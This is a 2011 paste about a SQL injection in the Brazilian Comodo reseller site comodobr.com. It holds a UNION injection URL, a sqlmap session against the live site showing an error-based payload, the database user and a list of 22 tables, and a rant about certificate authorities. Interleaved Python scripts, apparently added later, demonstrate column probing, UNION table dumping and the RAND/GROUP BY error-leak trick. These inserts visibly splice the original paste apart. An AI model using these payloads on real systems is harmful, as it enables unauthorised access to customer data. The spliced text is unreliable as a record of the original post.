Comodogate v2

By: Nicolai on May 22nd, 2011  |  syntax: None  |  size: 8.38 KB  |  views: 5,470  |  expires: Never
Received: from [199.48.147.35] by web120908.mail.ne1.yahoo.com via HTTP;
        Sun, 22 May 2011 11:20:54 PDT
X-Mailer: YahooMailClassic/14.0.1 YahooMailWebService/0.8.111.303096
Date: Sun, 22 May 2011 11:20:54 -0700 (PDT)
From: Hgkdfhklj Jdhglkjfdhg <gimmemyfiles@ymail.com>
X-Mailman-Approved-At: Sun, 22 May 2011 19:35:39 +0100
Cc: suporte@comodobr.com
Subject: [Full-disclosure] comodobr.com sqli


vulnerable link:
https://www.comodobr.com/comprar/compra_codesigning.php?prod=8 UNION ALL SELECT 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14 -- -

http://pastebin.com/9qwdL1pA


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
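As an added illustration (not code from the original paste, from the mail's author, or from comodobr.com, whose PHP source is not shown anywhere here), the Python script below reproduces the pattern behind a `?prod=8 UNION ALL SELECT ...` injection against an in-memory SQLite database standing in for the site's MySQL: a lookup that concatenates the `prod` parameter into the SQL text, the column-count probe an attacker runs before building such a UNION (the 15-column SELECT in the mail is one instance; the function here is the general procedure), a UNION payload that reads a second table through the product query, and a parameterised version of the same lookup that refuses it. The schema, column names and sample rows are constructed; only the table names `comodo_prods` and `comodo_users` appear in the paste.

```python
"""Added example: the injection pattern behind ``?prod=8 UNION ALL SELECT ...``.

Not code from the original paste or from comodobr.com (whose PHP is not shown).
SQLite stands in for the site's MySQL; the schema and rows below are constructed.
"""
import sqlite3


def make_db():
    """Build a throw-away database with two tables named as in the paste."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE comodo_prods (id INTEGER, name TEXT, price REAL)")
    db.execute("CREATE TABLE comodo_users (id INTEGER, login TEXT, pwhash TEXT)")
    db.executemany(
        "INSERT INTO comodo_prods VALUES (?, ?, ?)",
        [(8, "Code Signing 1yr", 199.0), (9, "Code Signing 2yr", 349.0)],  # constructed
    )
    db.executemany(
        "INSERT INTO comodo_users VALUES (?, ?, ?)",
        [(1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99")],  # constructed sample row
    )
    return db


def lookup_vulnerable(db, prod):
    """The classic bug, ``"... WHERE id = " . $_GET['prod']`` in PHP terms.

    Whatever arrives in ``prod`` becomes part of the SQL text, so SQL syntax in
    it is parsed and executed instead of being treated as a value.
    """
    sql = "SELECT id, name, price FROM comodo_prods WHERE id = " + prod
    return db.execute(sql).fetchall()


def lookup_fixed(db, prod):
    """Same query with the value validated up front and bound as a parameter."""
    if not prod.isdigit():
        raise ValueError("prod must be a non-negative integer")
    return db.execute(
        "SELECT id, name, price FROM comodo_prods WHERE id = ?", (int(prod),)
    ).fetchall()


def find_column_count(db, max_cols=20):
    """Step taken before any UNION payload: learn how many columns the original
    SELECT returns by growing a UNION of NULLs until the column-count error
    stops.  The mail's payload used 15 columns; this is how that number is found."""
    for n in range(1, max_cols + 1):
        probe = "0 UNION ALL SELECT " + ", ".join(["NULL"] * n) + " -- -"
        try:
            lookup_vulnerable(db, probe)
            return n
        except sqlite3.OperationalError:  # "SELECTs ... do not have the same number of result columns"
            continue
    return None


def union_dump(db, table, columns):
    """Read an arbitrary table through the product lookup (UNION-based SQLi)."""
    payload = "8 UNION ALL SELECT %s FROM %s -- -" % (", ".join(columns), table)
    return lookup_vulnerable(db, payload)


def injection_blocked(db, payload):
    """True if the hardened lookup refuses the payload instead of running it."""
    try:
        lookup_fixed(db, payload)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("legit:", lookup_vulnerable(db, "8"))
    print("columns:", find_column_count(db))
    print("dumped:", union_dump(db, "comodo_users", ["id", "login", "pwhash"]))
    print("blocked:", injection_blocked(db, "8 UNION ALL SELECT 0,1,2 -- -"))
```

The `-- -` tail is the same comment trick as in the mail: it discards whatever the application appends after the injected parameter. In the hardened version the value never reaches the SQL parser, so the same string is simply rejected.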
  22.  
  23.  
  24.  
  25.  
  26.  
  27.  
  28.  
  29.  
  30.  
  31. ---------------------------------------------------------------------
  32.  
  33.  
  34.  
  35.  
PS C:\Python27> nslookup 199.48.147.35
Server:  google-public-dns-a.google.com
Address:  8.8.8.8

Name:    tor-exit-router35-readme.formlessnetworking.net
Address:  199.48.147.35

>>> You're not going to find him... <<<
>>> Let's check the host: <<<

PS C:\Python27> .\python.exe C:\sqlmap-0.9\sqlmap.py --wizard

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 21:00:00

Please enter full target URL (-u): https://www.comodobr.com/comprar/compra_codesigning.php?prod=8
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1

sqlmap is running, please wait..

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: prod
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: prod=8 AND (SELECT 1198 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,109,109,58),(SELECT (CASE WHEN (1198=1198) THEN 1 ELSE 0 END)),CHAR(58,114,117,115,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
---

[21:00:00] [INFO] retrieved: 5.0.91-community-log

web application technology: PHP 5.2.6, Apache 2.0.63
back-end DBMS: MySQL 5.0
banner:    '5.0.91-community-log'

[21:00:00] [INFO] retrieved: comodobr_site@localhost
current user:    'comodobr_site@localhost'

[21:00:00] [INFO] retrieved: comodobr_comodobr
current database:    'comodobr_comodobr'

current user is DBA:    'False'


[*] shutting down at: 21:00:00

PS C:\Python27>
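The error-based payload sqlmap reports above relies on a well-known MySQL quirk rather than on anything specific to this site. Stripped of the CHAR() obfuscation it reads `CONCAT(':nmm:', <value>, ':rus:', FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x`. RAND(0) is a fixed sequence, so FLOOR(RAND(0)*2) yields 0, 1, 1, 0, 1, 1, ...; MySQL evaluates the GROUP BY key once to look it up in its temporary result table and again when inserting a new group, and by the third source row the insert collides with a key that already exists. The server then aborts with a "Duplicate entry" error that echoes the key, and with it the smuggled value between the `:nmm:` and `:rus:` markers, back into the HTTP response, where sqlmap reads it. The script below is added here and is not part of the original paste or of sqlmap: it decodes the CHAR() markers, reproduces MySQL's RAND(seed) generator (following its `my_rnd` routine), and models the double evaluation; the GROUP BY model and the error text are a simplification of the server's behaviour, not its code.

```python
"""Added example: why sqlmap's FLOOR(RAND(0)*2) ... GROUP BY payload leaks data.

Not code from the original paste or from sqlmap.  The RAND() generator follows
MySQL's my_rnd(); the GROUP BY part is a simplified model of the server.
"""
import re

MAX_RAND = 0x3FFFFFFF  # MySQL's rand_struct max_value


def mysql_rand(seed):
    """Yield the RAND(seed) sequence as MySQL computes it (seeding as in Item_func_rand)."""
    seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_RAND
    seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % MAX_RAND
    while True:
        seed1 = (seed1 * 3 + seed2) % MAX_RAND
        seed2 = (seed1 + seed2 + 33) % MAX_RAND
        yield seed1 / MAX_RAND


def floor_rand_bits(n, seed=0):
    """First n values of FLOOR(RAND(seed)*2); for seed 0 they start 0,1,1,0,1,1."""
    gen = mysql_rand(seed)
    return [int(next(gen) * 2) for _ in range(n)]


def decode_char_calls(sql):
    """Replace MySQL CHAR(a,b,...) with the string it builds,
    e.g. CHAR(58,110,109,109,58) -> ':nmm:'."""
    return re.sub(
        r"CHAR\(([\d,\s]+)\)",
        lambda m: "".join(chr(int(c)) for c in m.group(1).split(",")),
        sql,
    )


def simulate_group_by(leaked_value, n_rows, seed=0):
    """Model of  SELECT COUNT(*), CONCAT(':nmm:', v, ':rus:', FLOOR(RAND(0)*2)) x
    FROM t GROUP BY x  over n_rows source rows.  The key is evaluated once to look
    the group up and, if absent, again for the insert (the quirk).  With the
    0,1,1,0,1,1 sequence the third row looks up key ...0, misses, then inserts
    key ...1, which already exists: a duplicate-key error carrying the key."""
    gen = mysql_rand(seed)

    def key():
        return ":nmm:%s:rus:%d" % (leaked_value, int(next(gen) * 2))

    groups = {}
    for _ in range(n_rows):
        k = key()
        if k in groups:
            groups[k] += 1
            continue
        k = key()  # re-evaluated for the insert into the temporary table
        if k in groups:
            return "ERROR 1062 (23000): Duplicate entry '%s' for key 'group_key'" % k
        groups[k] = 1
    return groups


def extract_leak(error_text):
    """What sqlmap does with the response: pull the value from between its markers."""
    m = re.search(r":nmm:(.*?):rus:", error_text)
    return m.group(1) if m else None


if __name__ == "__main__":
    payload = ("CONCAT(CHAR(58,110,109,109,58),(SELECT (CASE WHEN (1198=1198) "
               "THEN 1 ELSE 0 END)),CHAR(58,114,117,115,58),FLOOR(RAND(0)*2))")
    print(decode_char_calls(payload))
    print(floor_rand_bits(6))
    err = simulate_group_by("1", n_rows=3)
    print(err)
    print("leaked:", extract_leak(err))
```

Two practical consequences follow from the model: the FROM clause must supply at least three rows (which is why sqlmap uses `information_schema.tables`), and the whole technique needs the database error text to reach the page, so suppressing error output to the client stops this particular channel even though the injection itself remains.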


>>> Looks real <<<
>>> Let's see the inside of the db: <<<


web application technology: PHP 5.2.6, Apache 2.0.63
back-end DBMS: MySQL 5.0
banner:    '5.0.91-community-log'
current user:    'comodobr_site@localhost'
current database:    'comodobr_comodobr'
current user is DBA:    'False'

[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_associa
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_categoria
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_importado
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_status
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_confirm_pago
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_contab
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_expected_delivery_time
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_hosting_contas
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_meios_pago
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedido_status
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedido_status_codes
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedidos
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedidos_historico
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_prod_grupos
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_prods
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_resellers
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_server_software
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_users
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_vw_crm_clientes
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_webhostreport_item
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_webhostreport_subitem
Database: comodobr_comodobr
[22 tables]
+-------------------------------+
| comodo_boleto                 |
| comodo_boleto_associa         |
| comodo_boleto_categoria       |
| comodo_boleto_importado       |
| comodo_boleto_status          |
| comodo_confirm_pago           |
| comodo_contab                 |
| comodo_expected_delivery_time |
| comodo_hosting_contas         |
| comodo_meios_pago             |
| comodo_pedido_status          |
| comodo_pedido_status_codes    |
| comodo_pedidos                |
| comodo_pedidos_historico      |
| comodo_prod_grupos            |
| comodo_prods                  |
| comodo_resellers              |
| comodo_server_software        |
| comodo_users                  |
| comodo_vw_crm_clientes        |
| comodo_webhostreport_item     |
| comodo_webhostreport_subitem  |
+-------------------------------+


[*] shutting down at: 21:00:00

PS C:\Python27>


When is Comodo going to fix this? How come Comodo is a CA? They shouldn't be trusted! And what about TÜRKTRUST.. Who the HELL are they? I don't trust them, but they are still a CA in my browser.. WHY? When are we going to see private certs from paypal, google, etc? Why does Firefox restore all my CAs when I delete them in the "Certificate Manager"? Do we *STILL* trust https? What's next?

GET YOUR SHIT TOGETHER.




EDIT: I'm not the "hacker". The "real hacker" is here: http://pastebin.com/u/gimmemyfiles
I've just checked his claims, which were true. Everyone can claim that they hacked Comodo, or that the vulnerability was fixed, so all I have done is open sqlmap and test it :-)

Also here's a new response:

Received: from [199.48.147.35] by web120910.mail.ne1.yahoo.com via HTTP;
        Tue, 24 May 2011 14:58:39 PDT
X-Mailer: YahooMailWebService/0.8.111.303096
Date: Tue, 24 May 2011 14:58:39 -0700 (PDT)
From: Hgkdfhklj Jdhglkjfdhg <gimmemyfiles AT ymail.com>
Cc: "support@comodobr.com" <support@comodobr.com>
Subject: [Full-disclosure] My comments on comodobr.com


    I have to agree with Comodo president and CEO, Melih Abdulhayoglu.

    In fact, anyone that can use sqlmap or pangolin and knows how to google for "filetype:php inurl:prod" could have found that sqli.
    However, the same way the security perimeter of the mainframe _should_ be extended to the desktops connected to it, it might be a good idea for resellers and partners to tighten up their own security. Further compromise of comodobr.com systems (_if_possible_) could have been a foothold into Comodo's systems.

    Just my 50 cents

    [Edit]
    The db dump was partial because the only thing omitted from the db dump was request logs. Either way, CSRs and client info shouldn't be "readily available" like this.
    No beef with comodobr.com or Comodo, just with companies in the security business that don't take care of their own.
    That's one of the reasons we have been trying to make the internet secure for so long. Some people just don't help.



http://pastebin.com/MFSUdCnk

_______________________________________________
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/


PS C:\Users\Nicolai> nslookup 199.48.147.35
Server:  google-public-dns-a.google.com
Address:  8.8.8.8

Name:    tor-exit-router35-readme.formlessnetworking.net
Address:  199.48.147.35

PS C:\Users\Nicolai>